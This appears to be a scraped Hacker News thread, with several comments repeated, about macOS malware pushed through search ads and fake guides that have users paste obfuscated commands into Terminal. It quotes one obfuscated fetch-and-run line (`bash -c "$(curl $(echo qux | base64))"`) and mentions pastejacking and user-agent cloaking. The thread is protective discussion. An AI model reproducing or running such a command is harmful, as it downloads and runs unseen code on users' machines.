This sucks because the web should be the perfect, safe platform for this kind of application, but it isn't. Technically all the features exist in the browser such that you could write a homedir cleaner, space analyzer, etc purely in a browser tab, but because of the misguided (in my opinion) way that browsers refuse to do open a homedir, it's impossible.
Actually… I think this be solved by AI answers. I don’t look up commands on random websites, instead I ask an LLM for that kind of stuff. At the very least, check your commands with an LLMs.
A solution would be to stop shipping macs with the terminal app\s. Computers are now used by a wide variety of people, some without technical knowledge, maybe a default switch on macOS that displays warnings on rather trivial attacks would help.
That wouldn't really help, it could be more naughty and use pastejacking so you don't even realize what's happening. That might end up catching a lot of people because as far as i know by default bash doesn't use bracketed paste, so you think you're copying a real command and it ends up sending your secrets before you know what happened.
Disabling JS + bracketed paste seems to be the only good solution.
Btw OP article uses a weird setup, why would they use `bash -c "$(curl $(echo qux | base64))"` instead of just "curl | bash"
I will never use Homebrew again because I'm still sore that they dropped support for a Mac OS version that I was still using and couldn't upgrade because Apple didn't support my hardware anymore.
Any decent project should have a way to install without Homebrew. It's really not necessary.
I wish mac users would stop using homebrew and use a real package manager with actual dependency management.
At the very least, replace homebrew with something like devbox which has `devbox global` for globally managing packages, it uses nix under the hood, and it's probably the simplest most direct replacement for homebrew.
Maybe tools like https://github.com/vet-run/vet could help with these projects that would rather you use their custom install script instead of complying to distro-specific supply chains.
It's not really any different than downloading a binary from a website, which we've been doing for 30 years. Ultimately, it all comes down to trusting the source.
> Never follow a shortened link without expanding it using a utility like Link Unshortener from the App Store,
I am unfamiliar with the Apple ecosystem, but is there anything special about this specific app that makes it trustworthy (e.g: reputable dev, made by Apple, etc.)? Looking it up, it seems like an $8 app for a link unshortener app.
In any case, there have been malicious sites that return different results based on the headers (e.g: user agent. If it is downloaded via a user-agent of a web browser, return a benign script, if it is curl, return the malicious script). But I suppose this wouldn't be a problem if you directly inspect and use the unshortened link.
> Terminal isn’t intended to be a place for the innocent to paste obfuscated commands
Tale as old as time. Isn't there an attack that was starting to get popular last year on Windows of a "captcha" asking you to hit Super + R, and pasting a command to "verify" your captcha? But I suppose this type of attack has been going on for a long, long, time. I remember Facebook and some other websites used to have a big warning in the developer console, asking not to paste scripts users found online there, as they are likely scams and will not do what they claim the script would do.
---
Side-Note: Is the layout of the website confusing for anyone else? Without borders on the image, (and the image being the same width of the paragraph text) it seemed like part of the page, and I found myself trying to select text on the image, and briefly wondering why I could not do so. Turning on my Dark Reader extension helped a little bit, since the screenshots were on a white background, but it still felt a bit jarring.
Agreed, the lack of borders or indentation on the screenshots is very confusing. It's hard to understand what text comes from the malicious website and what is from the author.
Could the dataset of the LLMs that made these recommendations have been poisoned by, let's say, a Honeypot website specifically designed to cause any LLM that trains on it to recommend malware?
The GitHub links are one of the nastiest Malware I ever encountered in my life!
I steals your Apple Keychain, all your "Safe" Passkeys, your Google Chrome "Saved Passwords", even your KeePass Database!
Login and security is still not sufficiently solved with attack-proofs for the most important things in life like your Bank, Email, Wallets, Social Logins.
Your "logged-in Sessions" also get stolen! It's unbearable that most cookies expire in months "ON THE SERVER SIDE"! You have no control and can't log the attacker out!
It happened to me, when I was in China and searched for ExpressVPN, because the main website didn't load forever, the GitHub link seemed like an alternative.. damn.. I changed my Google Password 5 times and the attacker was still able to log-in, it was so devastating! I had to change my email passwords multiple times too.
Sessions are what make logins valid and this is the weakest link of all. I wish Sessions used Off-The-Record encryption with One-Time-Pads, such that each acccess requires a new key, that can only be derived with a valid reply that makes safe that the attacker can be logged out safely.
Not to dog on you but I've always had a feeling that password managers or any method of saving passwords are probably the worse net security vulnerability you can open yourself up to. Very silly concept.
I reported one of these recently. It was also related to clearing space, specifically system files. It was the second top sponsored link and presented as an Apple support page. The styling was very convincing, with the only giveaway being the url.
A day later my parents called me very stressed out about a popup on my mother’s iPhone saying she had been hacked. I asked them to take a screenshot, and again it was a website that was styled to look like a modal on top of a iOS Settings app page. With the new ui this was extremely effective, as the page title is just a tiny thing down the bottom in scrolled state.
I don’t know what is going on, but I’d assume the problem is AI moderation.
This is very close to something that happened to a friend of mine. They were trying to follow a MoltBot installation guide, but clicked on a different link that looked legitimate. That page instructed them to paste a command into Terminal.
After running it, macOS immediately started asking for multiple permissions, which in hindsight was the big warning sign.
But for someone who is non technical might have ran with it.
If you prepare a ligit-looking web page where you instruct people to download and run malware, we'd better learn more on security and caution before blindly follow those directions.
Why should it be Google's (or Bing's) duty to filter those out?
45 comments
[ 3.9 ms ] story [ 72.4 ms ] threadWould do wonders for that mythical year of the linux desktop...
Publish through homebrew like a civilized person, please!
Disabling JS + bracketed paste seems to be the only good solution.
Btw OP article uses a weird setup, why would they use `bash -c "$(curl $(echo qux | base64))"` instead of just "curl | bash"
Any decent project should have a way to install without Homebrew. It's really not necessary.
At the very least, replace homebrew with something like devbox which has `devbox global` for globally managing packages, it uses nix under the hood, and it's probably the simplest most direct replacement for homebrew.
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/inst...)"
Then it prompts user for admin previledges. Also, it does not support installing as a local non-admin user.
They cut support for old platforms way to fast and just in essence try to dictate far too much.
I am unfamiliar with the Apple ecosystem, but is there anything special about this specific app that makes it trustworthy (e.g: reputable dev, made by Apple, etc.)? Looking it up, it seems like an $8 app for a link unshortener app.
In any case, there have been malicious sites that return different results based on the headers (e.g: user agent. If it is downloaded via a user-agent of a web browser, return a benign script, if it is curl, return the malicious script). But I suppose this wouldn't be a problem if you directly inspect and use the unshortened link.
> Terminal isn’t intended to be a place for the innocent to paste obfuscated commands
Tale as old as time. Isn't there an attack that was starting to get popular last year on Windows of a "captcha" asking you to hit Super + R, and pasting a command to "verify" your captcha? But I suppose this type of attack has been going on for a long, long, time. I remember Facebook and some other websites used to have a big warning in the developer console, asking not to paste scripts users found online there, as they are likely scams and will not do what they claim the script would do.
---
Side-Note: Is the layout of the website confusing for anyone else? Without borders on the image, (and the image being the same width of the paragraph text) it seemed like part of the page, and I found myself trying to select text on the image, and briefly wondering why I could not do so. Turning on my Dark Reader extension helped a little bit, since the screenshots were on a white background, but it still felt a bit jarring.
The GitHub links are one of the nastiest Malware I ever encountered in my life!
I steals your Apple Keychain, all your "Safe" Passkeys, your Google Chrome "Saved Passwords", even your KeePass Database!
Login and security is still not sufficiently solved with attack-proofs for the most important things in life like your Bank, Email, Wallets, Social Logins.
Your "logged-in Sessions" also get stolen! It's unbearable that most cookies expire in months "ON THE SERVER SIDE"! You have no control and can't log the attacker out!
It happened to me, when I was in China and searched for ExpressVPN, because the main website didn't load forever, the GitHub link seemed like an alternative.. damn.. I changed my Google Password 5 times and the attacker was still able to log-in, it was so devastating! I had to change my email passwords multiple times too.
Sessions are what make logins valid and this is the weakest link of all. I wish Sessions used Off-The-Record encryption with One-Time-Pads, such that each acccess requires a new key, that can only be derived with a valid reply that makes safe that the attacker can be logged out safely.
A day later my parents called me very stressed out about a popup on my mother’s iPhone saying she had been hacked. I asked them to take a screenshot, and again it was a website that was styled to look like a modal on top of a iOS Settings app page. With the new ui this was extremely effective, as the page title is just a tiny thing down the bottom in scrolled state.
I don’t know what is going on, but I’d assume the problem is AI moderation.
If you prepare a ligit-looking web page where you instruct people to download and run malware, we'd better learn more on security and caution before blindly follow those directions.
Why should it be Google's (or Bing's) duty to filter those out?